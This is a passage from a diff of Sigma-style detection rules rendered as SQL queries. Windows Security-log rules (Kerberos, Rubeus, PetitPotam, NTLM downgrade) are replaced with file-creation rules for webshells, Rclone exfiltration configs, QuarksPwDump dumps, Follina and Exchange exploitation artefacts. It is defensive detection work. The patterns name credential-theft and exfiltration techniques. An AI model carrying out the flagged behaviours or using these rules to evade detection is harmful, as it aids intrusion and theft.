"eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "EVTX Created In Uncommon Location", + "id": "65236ec7-ace0-4f0c-82fd-737b04fd4dcb", + "status": "experimental", + "description": "Detects the creation of new files with the \".evtx\" extension in non-common locations. Which could indicate tampering with default evtx locations in order to evade security controls", + "author": "D3F7A5105", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Web Browsers" + "Admin activity", + "Backup activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.evtx' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Containers\\\\BaseImages\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\dllhost.exe' ESCAPE '\\'))))" ], - "filename": 
"win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_create_evtx_non_common_locations.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky 
EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (NewProcessName = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": 
"win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "status": "test", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` 
in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "User with Privileges Logon", - "id": "94309181-d345-4cbf-b5fe-061769bdf9cb", + "title": "Suspicious PFX File Creation", + "id": "dca1b3e8-e043-4ec8-85d7-867f334b5724", + "status": "test", + "description": "A general detection for processes creating PFX files. This could be an indicator of an adversary exporting a local certificate to a PFX file.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ], + "falsepositives": [ + "System administrators managing certififcates." 
+ ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.pfx' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%\\\\Templates\\\\Windows\\\\Windows\\_TemporaryKey.pfx%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\CMake\\\\%' ESCAPE '\\')))" + ], + "filename": "file_event_win_susp_pfx_file_creation.yml" + }, + { + "title": "Creation In User Word Startup Folder", + "id": "a10a2c40-2c4d-49f8-b557-1a946bc55d9d", "status": "experimental", - "description": "Detects logon with \"Special groups\" and \"Special Privileges\" can be thought of as Administrator groups or privileges.", + "description": "Detects the creation of an file in user Word Startup", "author": "frack113", + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ], "falsepositives": [ - "Unknown" + "Addition of legitimate plugins" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4672', '4964') AND NOT (SubjectUserSid = 'S-1-5-18'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word\\\\STARTUP\\\\%' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotx' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.docb' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.wll' ESCAPE '\\' OR TargetFilename LIKE '%.wwl' ESCAPE '\\')))" ], - "filename": "win_security_admin_logon.yml" + "filename": "file_event_win_office_winword_startup.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "title": "Suspicious Word Cab File Write 
CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", + "status": "experimental", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_winword_cve_2021_40444.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup 
folder", "author": "Samir Bousseaden", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", "status": "experimental", - 
"description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.credential_access", - "attack.t1187" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Unknown. Feedback welcomed." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND 
TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Potential Privileged System Service Operation - SeLoadDriverPrivilege", - "id": "f63508a0-c809-4435-b3be-ed819394d612", - "status": "test", - "description": "Detects the usage of the 'SeLoadDriverPrivilege' privilege. This privilege is required to load or unload a device driver.\nWith this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode.\nThis user right does not apply to Plug and Play device drivers.\nIf you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers.\nThis will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.\n", - "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", + "status": "experimental", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other legimate tools loading drivers. Including but not limited to, Sysinternals, CPU-Z, AVs etc. A baseline needs to be created according to the used products and allowed tools. A good thing to do is to try and exclude users who are allowed to load drivers." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4673' AND PrivilegeList = 'SeLoadDriverPrivilege' AND Service = '-') AND NOT (((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\fltMC.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\HelpPane.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\mmc.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wimserv.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\RuntimeBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR ((ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procmon.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\Microsoft%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE 
'%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_user_driver_loaded.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "description": "Detects a dump file written by QuarksPwDump password dumper", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE 
'%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "title": "PSEXEC Remote Execution File Artefact", + "id": 
"304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "status": "experimental", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.execution", + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 